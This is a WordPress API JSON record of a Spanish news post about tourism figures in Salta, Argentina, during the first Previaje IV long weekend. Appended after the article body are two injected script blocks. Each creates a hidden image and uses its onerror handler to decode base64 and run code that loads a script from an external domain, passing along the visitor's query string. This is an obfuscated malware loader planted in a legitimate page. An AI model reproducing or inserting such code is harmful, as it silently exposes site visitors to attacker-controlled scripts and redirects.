{"id":2674,"date":"2023-05-30T10:14:24","date_gmt":"2023-05-30T13:14:24","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2674"},"modified":"2025-08-14T00:16:13","modified_gmt":"2025-08-14T03:16:13","slug":"el-primer-fin-de-semana-largo-con-previaje-genero-en-salta-un-impacto-economico-de-1200-millones","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2674","title":{"rendered":"El primer fin de semana largo con Previaje gener\u00f3 en Salta un impacto econ\u00f3mico de $1200 millones"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#92072a\"><em>En coincidencia con el feriado del 25 de Mayo comenz\u00f3 el periodo de arribo de turistas que conviertieron a la provincia en el destino m\u00e1s elegido de PreViaje.<\/em><\/h4>\n\n\n\n<p>El Ministerio de Turismo y Deportes de Salta dio a conocer los indicadores registrados en el fin de semana extendido producto de conmemorarse el 213\u00ba aniversario de la Revoluci\u00f3n de Mayo. Tambi\u00e9n, el 24 de mayo comenzaron a llegar turistas en el marco de Previaje IV, periodo que se extender\u00e1 hasta el 30 de junio, que permitir\u00e1 a los destinos incrementar niveles de ocupaci\u00f3n en lo que antes era considerado temporada baja.<\/p>\n\n\n\n<p>Los turistas que reservaron en los destintos alojamientos tur\u00edsticos fueron 27.753, con un pernocte promedio de 2,5 noches y un impacto econ\u00f3mico de $1.222.172.738. El gasto estimado por turistas fue de $17.615.<\/p>\n\n\n\n<p>El \u00e1rea tur\u00edstica provincial inform\u00f3 que la tasa neta de ocupaci\u00f3n tur\u00edstica provincial fue del 86%, destac\u00e1ndose la ocupaci\u00f3n en San Antonio de los Cobres de la mano del \u00edcono tur\u00edstico Tren a las Nubes, tambi\u00e9n en Cafayate, Cachi, Molinos, San Lorenzo, Ciudad de Salta, Coronel Moldes, Rosario de la Frontera, Chicoana y San Carlos.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7276-el-primer-fin-de-semana-largo-con-previaje-genero-en-salta-un-impacto-economico-de-1200-millones.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7276-el-primer-fin-de-semana-largo-con-previaje-genero-en-salta-un-impacto-economico-de-1200-millones.jpg\" alt=\"El primer fin de semana largo con Previaje gener\u00f3 en Salta un impacto econ\u00f3mico de $1200 millones\"\/><\/a><\/figure>\n\n\n\n<p>\u201cEst\u00e1 claro que es acertada la decisi\u00f3n pol\u00edtica de lo que significa PreViaje en lo que hasta 2019 era temporada baja\u201d, indic\u00f3 el ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>, destacando el impacto en las regiones tur\u00edsticas de la provincia y en actividades directa e indirectamente vinculadas a la industria tur\u00edstica.<\/p>\n\n\n\n<p>La Provincia fue la m\u00e1s elegida en el \u00faltimo periodo de ventas de PreViaje. \u201cVemos con esto, resultados de un gran trabajo de promoci\u00f3n estrat\u00e9gica del destino en los principales mercados nacionales, pero adem\u00e1s, un gran desarrollo de productos innovadores de la mano del sector privado que se complementa con grandes atractivos paisaj\u00edsticos, una gastronom\u00eda atrayente y una acervo cultural que convierten a Salta en un destino de referencia\u201d, indic\u00f3 Pe\u00f1a.<\/p>\n\n\n\n<p>La conectividad es otro factor clave, conexiones a\u00e9reas directas con nueve destinos nacionales, con San Pablo en Brasil y desde diciembre con Lima, consolidan a Salta como eje del tr\u00e1fico tur\u00edstico de la regi\u00f3n.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El primer fin de semana largo con Previaje gener\u00f3 en Salta un impacto econ\u00f3mico de $1200 millones\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/JftXPXS2Wg4?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En coincidencia con el feriado del 25 de Mayo comenz\u00f3 el periodo de arribo de turistas que conviertieron a la provincia en el destino m\u00e1s elegido de PreViaje. El Ministerio de Turismo y Deportes de Salta dio a conocer los indicadores registrados en el fin de semana extendido producto de conmemorarse el 213\u00ba aniversario de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2675,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,15],"tags":[],"class_list":{"0":"post-2674","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2674"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2674"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2674\/revisions"}],"predecessor-version":[{"id":7074,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2674\/revisions\/7074"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2675"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2674"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2674"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2674"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}